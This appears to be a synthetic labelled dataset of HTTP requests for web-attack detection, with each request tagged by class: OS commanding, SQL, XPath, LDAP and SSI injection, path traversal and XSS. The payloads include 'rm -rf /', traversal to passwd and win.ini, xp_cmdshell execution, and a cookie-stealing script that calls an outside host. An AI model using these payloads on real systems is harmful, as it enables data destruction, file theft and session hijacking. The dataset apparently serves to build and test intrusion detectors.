Trailer: From
User-Agent: cliildslir0e
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/4.4 68.103.204.17, oER/4.5 227.47.97.62
Transfer-Encoding: gzip
Upgrade: sin/4.4, nanj/1.1, sfgit/8.7, sxHu/2.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sMahbllallnto=ele6fkclie2&eyu=teuobh8c&n2arib=mcrar&ttera=rca+oo|5awetnny&Yo8wBseI=74543937&ol=ny&A2UqsxyE=og&egtdr3tr2Othds=ore&nr7c6onecfIEsn=Fyr86oiMDanip&oet=3683&I1rrseeu=22086&t4=704&ianhgt0caexa=tLxJSMCY&ksfRtqxiEn4b=70848743&itun=`   rm  -rf   / `

End - Id: 43043
Start - Id: 44148
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.z7sstti.net:52
Connection: close
Accept: image/jpeg
Accept-Charset: ks_c_5601-1987, iso-8859-8-i;q=0.7, shift_jis;q=0.0, x-mac-chinesesimp;q=0.6, iso-8859-4
Accept-Encoding: *;q=0.7
Accept-Language: osoatav-drmr5e;q=0.8, et6-tlse;q=0.7, a-aoAfaekt
Cache-Control: only-if-cached
Client-ip: 39.47.60.88
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="16"
Date: Mon, 13 Oct 08 14:19:35 GMT
ETag: "dKgn5-pZg-kmiPy"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 11 Aug 07 08:00:30 UTC
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: "I1IP.dXWP20@9hwCk6.6"
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 0031
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: tMqhEe tIsc=uo9tsxe
Authorization: Digest algorithm=MD5
Range: 815-,644-20793
Referer: /eWruhUwi/npfndah/maiE.ace
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: uooltiblhf (wt1Qy.; vPOKktcYDZ; oYtZ7uX; aiqxqS4)
UA-CPU: Sparc
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: ha1tyt
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44148
Start - Id: 49663
class: XPathInjection
GET /sCQITz.XEgjXq_/UnNsatdos7dii.cgi?nlaroGsosei5xf=i%2Fiet2m5%2Fhlkot4%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D10%5D++%7C++++t%2Funost%2Fed%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D501%5D+++++or+++%27te%27+%3D+++%27&esxsrtyM=421530&ouhspedn7S=466145&9csA5tirje0=ak+6epescdlorly HTTP/1.0
Host: www.qoxatrhte5.biz:2528
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 35.126.171.6
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Sat, 11 Mar 06 11:15:14 CET
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Sat, 19 Nov 05 03:19:41 UTC
If-Match: "CEES_gQEnf860LuG"
If-None-Match: *
If-Range: Wed, 04 Mar 09 13:52:13 UTC
Max-Forwards: 7
MIME-Version: 7.2
Pragma: a5dme='ou'
Proxy-Authorization: Digest nonce
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: /na2iol/owtM/ntriohy.pl
TE: trailers,gzip
Trailer: Date
User-Agent: iiteasits3/0.1.0.6.1
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 668x5866
Via: FTP/0.9 11.193.124.145, Qwoue/9.7 191.20.43.250, 5.8 www.frun.htm
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49663
Start - Id: 45318
class: PathTransversal
GET /ntMq5vqieZAjtva/b0Qpzs/LTZMDMiframe3c2ELKm/cMbd/oiyoxmg/yeh9hnetHtRrw6emoiN/eqf0/5w9-tKetc-2f/sx/eOXueYpH@1Zb2YmJX/aoo8deermieafaw0w.asmx?BUgZr1s9=76344304&nsro2lyrmLlMz=euybq1intltssBvz&etetnrz7daL=eotoOean7qmVe&tghbsasxRii2d=s5OS&8DwFvBscriptV=yewcoTf3lHsLtIrps&tie1b2aenyianSa=rr&exWniataw=ityralhIsceoAor5wr&uhadAlqiEu=T&S04co1znriLvao=aOt4iu+yS%5Bgw%40oc&yN=%2B&ylai=od6cCgB%40&htoE=trm&6hee1zAys=74103 HTTP/1.0
Host: www.oetmghstge.fr
Connection: ZoAq8
Accept: text/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.5
Accept-Language: LTwe-imelUmdU;q=0.7, n12h1-h
Cache-Control: mrobiies=i
Client-ip: 221.34.229.122
Cookie: ninsertcmdi6VHMT=../../../../../../../../../WINNT/autoexec.bat;swhInac=s;5musrgIaae=shtacces;cnen8dvdedo=i1pYlT;Lcemei4snnahnt=4992832;eeeonwoare=24
Cookie2: $Version="99"
Date: Wed, 01 Aug 07 06:33:28 UTC
ETag: W/"L@.MOteuK0dRFhGjRtBY"
Expect: tEjgrao=idotr
From: a4intom@hlkrmt.biz
If-Modified-Since: Thu, 17 Jul 08 12:04:32 UTC
If-Unmodified-Since: Tue, 01 May 07 22:31:12 UTC
If-Match: *
If-None-Match: *
If-Range: "sGqva@JMfanmMh6bX4dU"
Max-Forwards: 9565
MIME-Version: 0.3
Pragma: 5='hbbsde'
Proxy-Authorization: Digest username="suDgtorl"
Authorization: unwol eoeor=occeafsa
Range: 5-530576,62871-039,-80
Referer: http://www.2elfrM.cz/Slu0eb9/puksisB/iiaadoas/n9gl/trer.swf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: a2sGreeNN
UA-CPU: x86
UA-Disp: 4810,872,32
UA-OS: Win95
UA-Color: color8
Via: 6.3 www.i2rh.html, gnllno/9.9 www.ec2m9te.htm, 6.3 201.111.216.236
Transfer-Encoding: deflate
Upgrade: ee3n/0.9, she/0.7
Warning: 447 www.ioood.jpg "n8pysra7eb" "Tue, 24 Feb 09 23:10:50 GMT"
X-Forwarded-For: 74.25.201.88
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45318
Start - Id: 46873
class: XSS
POST /y.LV/dergtbnn9ucrlxalo1/qWaP1_OE_Du/7h@tmphxsamhUT45/xT1/SejlUebayss/7skgiwa.asmx? HTTP/1.1
Content-Length: 447
Content-Language: 4tidwth,et
Content-Encoding: deflate
Content-Location: http://www.37tanctl.biz/dihsaha/otahee.aspx
Content-MD5: T1RlUmZ5ZWFzcm1uaXdlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Oct 07 04:40:11 CET
Last-Modified: Fri, 22 Jun 07 21:28:56 UTC
Host: www.sEofe.uk:87
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: sapt-tddpeeqa;q=0.1
Cache-Control: min-fresh=11
Client-ip: 89.81.27.19
Cookie: eftsWO=htytMoTnwinnt|;1zhttps9NG=httpseeio?peDa8ee
Cookie2: $Version="8"
Date: Sun, 18 Apr 10 07:46:11 GMT
ETag: W/"UJaBjRbIXH2xiGBR32J"
Expect: mleses2
From: xorersew@0i1thu.fr
If-Modified-Since: Thu, 04 Feb 10 16:49:13 UTC
If-Unmodified-Since: Fri, 11 Mar 05 16:39:07 GMT
If-Match: "DXsJZHPtR_wDooUiIp"
If-None-Match: *
If-Range: *
Max-Forwards: 65
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: -94470,97-,3320-
Referer: /6itaea/3LiEes.fgf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 8.2; i3-Pt; rv:7.7.7) Gecko/18503056
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: FTP/3.0 159.8.188.28, 5.7 185.242.215.249
Transfer-Encoding: identity
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

vboot.iniETUtmpc=63&ntoenIeeon0=formum8&go= g2~nluscssecq%fN&hELVcopy1BeUeK=wcaN6s6between-oedwheretmp/ oe&te=tertebrfr&edoNesdfpoicq=<bgsound  src   =  "    javascript:   [document.location.replace ('http://www.rili.com/cgi-bin/elroolma.cgi'+document.cookie);]    "    >&aeldlcs=e0rcrcn&0ATK-8k=selectr&asesrpmhlrutdss=f&Ha=270904&asa=0Q.2Y2U&le8=az&tafprao5eiNlac=csMli-YR&oeseftehy=atlen&ndwhyttS=k d

End - Id: 46873
Start - Id: 38778
class: LdapInjection
GET /uYX48ewdaGP11HFd/nhYdBee/bQoGDPJxsjCL9t6M.T.js?wavzgtashnelmi4=%244b+%3FlzEceusraszN&_ZQbetweenH6kIXrY=57937&tofniA=3%3Cc%3Arrnt4&Eae=eseedflog&hNcsoeamaL=oyI5&DrratcpScloW=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ofntojrtefNLob=6ie%3Estryancoa8%7C&HGvOXSla.B=7thzlixwd&2kHWK=eih HTTP/1.1
Host: 246.87.198.21:80
Connection: keep-alive
Accept: text/plain, text/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 103.114.5.31
Cookie: 7-L0-a=nhw;631lRhA7d9M=Dhbmaaf;adywe=tx-AWyeRz@S;q5ldkdvo3bptl93=2412
Cookie2: $Version="919"
Date: Thu, 05 Aug 04 12:54:23 UTC
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 14 Sep 08 06:42:47 UTC
If-Unmodified-Since: Fri, 26 Mar 04 24:55:50 GMT
If-Match: *
If-None-Match: *
If-Range: "WumTLqIPh_8WEXcrbd"
Max-Forwards: 06
MIME-Version: 6.0
Pragma: veRgcs='nR'
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: NTLM TmFmd3RlcnpucHh4dWllY2FjZXQ1QW1pdXRmMnNveHZkaXRlYWh0OG5va25hbw==
Range: 7-
Referer: /iidc.png
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/3.9 (X11; U; Solaris 2.1; em-ti; rv:6.3.3) Gecko/75065175
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 917x4945
Via: Day/0.5 191.130.216.182
Transfer-Encoding: deflate
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38778
Start - Id: 36236
class: PathTransversal
GET /eOmb4ql5cre3Q/JMSDyN1-GF/ram/rs6N198pE1twCSEuRC/ho9h7mheljdoo3ia/c@Zgk7TEw-pe4d/aH4B3JDT5TkO7rg6/CtmpS/lca/asnen9T/@TuEd0UHibq/a0xtr2latIA.png?yvo=8915852&iNcmeH=3uyS3&D0IS0eJ5ftp-=10739&gM7unRor2=dpyoiedOE HTTP/1.1
Host: 85.35.19.126:570
Connection: OkFtm
Accept: video/quicktime;q=0.2, text/html;q=0.5, video/quicktime
Accept-Charset: iso-8859-5
Accept-Encoding: ../../../../../../../../../etc/passwd
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 85.164.133.110
Date: Mon, 01 Mar 10 03:05:19 GMT
From: m2sjud@ksr7jeno.com
If-Modified-Since: Fri, 13 Oct 06 07:22:30 UTC
If-Match: "-7ViJnuOfgncmQSz"
If-None-Match: *
If-Range: "q5UBGGGFJq@-6cW"
Max-Forwards: 384
Referer: /aha2erAo/eLro.exe
User-Agent: dec2/5.2.1
Via: 5.8 www.iErjere.png
Transfer-Encoding: emqm; SieY=agfDl
Warning: 936 www.oddai.htm "ticEeoflnmcen" 

null

End - Id: 36236
Start - Id: 42218
class: SqlInjection
GET /Modae/eIygxcf/e.Rah9g3j8urHD269aB/a2R_/1NOYlog9elFW/4KBpsWasHDS/lIqlhO0X7YI/KVVT.html?oneoafylvsAyrkr=4855548&44jidAiuxcbgrpN=+%3Bhfe&t1seanhnhlDtans=e+eAss&txIirsacbh7i=o+i%7C1ssgx%28ur+ae&hXmb=p%249%3Aorndu&bG=lor2dseeg&2dgw=bEdaitgsgo&DW3ps@vbscriptImeta2a=Tstenaddfecpsd2i&tos=74630&snG8Inonzgiu5si=C6cvTuiE+4childnt&_tmpb5=5119&PLU2likeI2kG=chairs%27+UNION+SELECT+tEoift+++FROM++dba_users+WHERE++++name++like+++++%27%2525&dwa=5HR HTTP/1.0
Host: 82.42.122.156
Connection: v1rTnabn
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: Eo9x='k'
Client-ip: 97.137.241.136
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="069"
Date: Fri, 15 Jun 07 20:15:45 CET
ETag: "qu.jZl22SCIG3R.JF"
Expect: cttahr1o
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 16 Aug 06 18:22:05 CET
If-Unmodified-Since: Thu, 09 Jul 09 02:19:45 GMT
If-Match: "oeWmBKmYF6Sq1VNuZW"
If-None-Match: "E@mk8FxwZdsOt_Ws.L6"
If-Range: Thu, 17 Dec 09 03:59:25 CET
Max-Forwards: 3
MIME-Version: 0.3
Pragma: ateTrT='n'
Proxy-Authorization: Basic emg1ZWk5ZWE6NHNMZWdEdTk=
Authorization: Digest response="3dFEc973fFBDaf8DdAccD8fD761432C3"
Range: -66
Referer: http://www.INtye.ch/o1pdRqe/lai42F9.mp3
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.0 (X11; U; Linux i586 4.9; ti-re; rv:6.6.0) Gecko/54255918
UA-CPU: x86
UA-Disp: 814,8344,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 451x3766
Via: FTP/8.0 www.4He8ilw.shtml, 1d5eu/3.8 76.171.56.196, 6.0 123.216.0.165:62
Transfer-Encoding: compress
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42218
Start - Id: 42363
class: SqlInjection
GET /swGZubI@Nqt/aSeucnoyyieceede.asp?etajOah=p6o3htmdrwyt&hea=7396996&6G6@hxgg5c=wntNnptut&qsreltyRhyhaoo=14&eNRuaaoa1is=lS.LxJg&taStskehtohdrn=%27%3B+insert+into++++Dun+++values%28666%2C%27dnmf%27%2C%27tayae%27%2C0xfffff%29&n3eeAanxine=eDIY7hD&hlogHmnUS5-=NonINnamr&mbn6Ut6ne=stecmfMnidatH&yes=3&eicEeeihn9heF=uqPjYJeQejS&bs=wreiay&lRfvf=ihLTquVWNJoB HTTP/1.1
Host: www.aoofndu5.it
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.2, cp-932, iso-8859-8;q=0.2
Accept-Encoding: 
Accept-Language: wlte-sSlnu, t1heocfj-teufaUri;q=0.9, ad23-UAd;q=0.8
Cache-Control: max-age=05
Client-ip: 216.245.152.103
Cookie: st59forbhMywtns=n
Cookie2: $Version="88"
Date: Wed, 03 Oct 07 01:12:42 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: 100-continue
From: 7Wathoi0@p7np.ch
If-Modified-Since: Sat, 05 Mar 05 23:08:48 UTC
If-Unmodified-Since: Wed, 24 Aug 05 02:43:40 UTC
If-Match: *
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 60
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: http://www.ZsunlY.org/eerdrsgG.dll
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 9.1; th-ua; rv:1.5.7) Gecko/50807940
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x018
Via: 9.6 87.19.202.11, 6.6 10.172.82.15
Transfer-Encoding: roer; nj9r=eVstiEl
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 173.232.8.193
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42363
Start - Id: 41005
class: SqlInjection
POST /dXadIRNHr92--@2A/dnx7atrinrgbissekM/jhii1rxYr7ee/uKkJ.FM6CYcTYvSw4N/rHFVCpFp49vTp4oQN1sM/lo/dchxel8eett/sheoOntFa/t6FFJjeFFu6Dn.u5Q2aX/3af23cbpbaitnt/yhYeeohrevopmude.tiff? HTTP/1.0
Content-Length: 171
Content-Language: ssPttr,medsaPjb,lTsauk
Content-Encoding: identity
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: MmVpbGFldTlvb3JsZW50RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Sep 04 17:54:36 GMT
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: www.Hlg1ltcOte.fr
Connection: close
Accept: text/plain;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ese6assh-1eoen;q=0.9, i4u-lisoRSee;q=0.1
Cache-Control: max-age=2172
Client-ip: 40.88.12.243
Cookie: r0uee5Tnhidrt1a=saiArrfrUdceitp
Cookie2: $Version="889"
Date: Sat, 23 Jul 05 07:33:00 UTC
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: v0sro3=eghTm;eprtAa2
From: 7nl6mn3@atvy.de
If-Modified-Since: Wed, 27 Dec 06 09:20:42 CET
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 9970
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: /to0e/Sztt/Titotif/uet6bRyw/t0tklmi.jsp
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/8.9 (X11; U; Unix 3.7; io-in; rv:5.9.3) Gecko/33740715
UA-Pixels: 892x2342
Via: HTTP/4.5 www.oedinl.jpeg, 9.1 242.232.16.77, 7.5 www.mlj3seti.html
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 481 www.urpe.html "staaipsty" "Sat, 08 Jan 05 13:43:34 GMT"
X-Forwarded-For: 66.233.204.94
X-Serial-Number: 0694203566390094
----: ------------

Bej=046462&ewevar=';EXECmaster.dbo.xp_cmdshell'cmd.exe&ru=nlrt&a8sIszAim=Deep&mwgetJI=fX  re&itlwFae7eqhstos=ph@AEF&i0suurtc=24927&er=5660839&wdseRueb7troi4q=23686

End - Id: 41005
Start - Id: 40025
class: SSI
GET /K@HfkJ5H3P2C8g/c4444togsel/rlcnyOwc0ui/olo8gl/si3NhdMDzHt/ucbSccdRmbjEn88e.msf?.vovDsuimeta=y53fr&ctgmw8Wuh=un&XH0o_WCJDQbin.=ltnjtevJeifa&J6lnU0Li0F=1899378&tiry9p8jihsxdh3=1iEbutmJierarti&nare6trcwhdnrad=%3C%21--+%23exec+++cmd%3D%22%2Fbin%2Fls+++-l+++%2Fhome%2Fttaln2mg%2Fm1sndpirys%22+--%3E HTTP/1.0
Host: 3.201.176.89
Connection: EetoOw
Accept: text/*;q=0.7
Accept-Charset: x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 3.134.210.79
Cookie: tsNSc=28623;twohp=t']s&;14g4fhnXaA= wmleim aonift
Cookie2: $Version="0"
Date: Thu, 11 Oct 07 12:44:01 CET
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Sun, 11 Feb 07 03:54:13 CET
If-Unmodified-Since: Fri, 07 Nov 08 03:18:47 GMT
If-Match: "j1LaojyNq3nlawlCSz-l"
If-None-Match: "dQmEz.uBsO8EW12"
If-Range: Sat, 13 Dec 08 07:43:08 CET
Max-Forwards: 744
MIME-Version: 9.8
Pragma: s=T
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: Digest cnonce="ainumz"
Range: 639193-1,618159-02
Referer: /wava.jsp
TE: deflate;q=0.4,trailers
Trailer: Accept
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 2.7; Dh-tP; rv:7.0.3) Gecko/57296679
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: Nrnoel/4.3 www.oaaas.png:85930, 1.4 128.124.42.106:03, HTTP/9.5 www.H3sLt.gif
Transfer-Encoding: gzip
Upgrade: 9gTeo/9.5
Warning: 801 www.A9Ccfets.tiff "iayeatistfeuar6rsnb" "Tue, 13 Sep 05 19:40:44 GMT"
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40025
Start - Id: 41064
class: SqlInjection
GET /aod5ioy/coic/Ory5t6aifPueid4ll/eiulsBfaEweiinszinr7/dbunBEhcsseeii.jpg?0e=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&dtifsdtriAme=osT3&eeeineHeiie=03&lyrd7an=nAxJr6kvcm5 HTTP/1.0
Host: 59.251.135.174
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.4, iso-10646-ucs-2, iso-8859-6, iso-8859-9, windows-1255;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 29.8.160.212
Cookie: uqnfoAE0ooq=36979861;2p=8echoe5s\ae
Cookie2: $Version="53"
Date: Thu, 04 May 06 14:53:06 CET
ETag: "x.hbUQbHgkte8ldBa7p"
Expect: ttrhbztf
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Wed, 19 Mar 08 23:17:34 GMT
If-Unmodified-Since: Fri, 04 Apr 08 19:38:00 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 15 Sep 06 15:01:05 UTC
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: tsea EEnteeft=hrshPsoi
Range: 7-04,570-
Referer: /eeoxwjm.sh
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: 9nnataBvU (lNznJg; eAAUiwBI; i_kCIjY)
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: FTP/5.9 www.2ehn.tiff, stIy/3.8 132.91.84.197, 8.7 21.228.69.137
Transfer-Encoding: deflate
Upgrade: uohtr/6.5, oeo/0.4
Warning: 929 33.62.91.208 "gsh7lfen" 
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41064
Start - Id: 36217
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 178.110.69.158
Connection: close
Accept: text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0-h;q=0.2, IR3gn-6y9;q=0.2, jtid-v;q=0.8, lr-ose;q=0.2, h-w5isnean;q=0.8
Cache-Control: Jlceif=tyiAf
Client-ip: 253.92.235.246
Cookie: A0ruzsuariit=csm2Ce5Ruyihlsdh;wouervt=rhwflIqdyehH;JqFTsE6=g/f+;1a=e6eir
Cookie2: $Version="830"
Date: Sun, 09 May 04 06:03:51 GMT
ETag: W/"61@XYEowE14r6d8"
Expect: 100-continue
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Unmodified-Since: Sun, 11 Feb 07 19:49:27 GMT
If-Match: *
If-None-Match: *
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: at='o'
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM bnBhSG9heGkzaGxvZUVvN293Y3o2ZW1ocEVyaHRheW90dG4xdGVlaXBMNHQ=
Range: 183-
Referer: /flhdh2e/s0idu.mpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (Windows; U; WinNT 8.8; mm-Xx; rv:0.4.9) Gecko/43751578
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: 5.8 110.84.189.241, HTTP/9.2 1.12.74.59
Transfer-Encoding: deflate
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36217
Start - Id: 46038
class: PathTransversal
GET /8tr9nrhi3ttesHinla60/eSeCP43phBKUi/bnpqaee3n6otin/bZ/2qHN2J/Trp.nsf?Gitsr0=eJAG_xGIJ&7Idulksi=ytu+6&e5gERs=6163&ZcLLCopenfCUEdropG=%7Coilwlscript%5De&asilsm=dEebuT HTTP/1.0
Host: www.t9al.st:80
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: ks_c_5601-1987, iso-8859-5, shift_jis
Accept-Encoding: 
Accept-Language: /,,,/rosaOh/ilnudo/passwd
Cache-Control: no-transform
Client-ip: 62.95.118.93
Cookie: iinatoqy1=);eierehs=Arlinsertm;oehqh=20436595;afehzefx=h"tuki| a"6mriobject
Cookie2: $Version="01"
Date: Wed, 27 Feb 08 18:53:13 GMT
ETag: W/"WDieNzqnzdhyTvCJ1"
Expect: olLo=ev0eans
If-Modified-Since: Sun, 07 Aug 05 09:36:55 GMT
If-Unmodified-Since: Sat, 12 Jul 08 05:47:21 GMT
If-Match: "1DKLAE8Z102@qgZq"
If-None-Match: "@Q-2p3PXvj53esvrCofY"
If-Range: *
Max-Forwards: 1
Pragma: no-cache
Authorization: Basic NWltdW46ZXMybzU5
Range: 96418-,-1,193-
Referer: http://r3sc9.biz/6e3uni/pjta9ePn/llykkaq/nlesODe.nsf
Trailer: Accept-Language
User-Agent: ssRq1oamffm3r
UA-Pixels: 376x6038
Via: 2.6 63.146.63.218, FTP/3.9 www.autu.tiff:717
Upgrade: n41se/5.7
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
~~~~~: ~~~~~~~~~~~

null

End - Id: 46038
Start - Id: 37153
class: LdapInjection
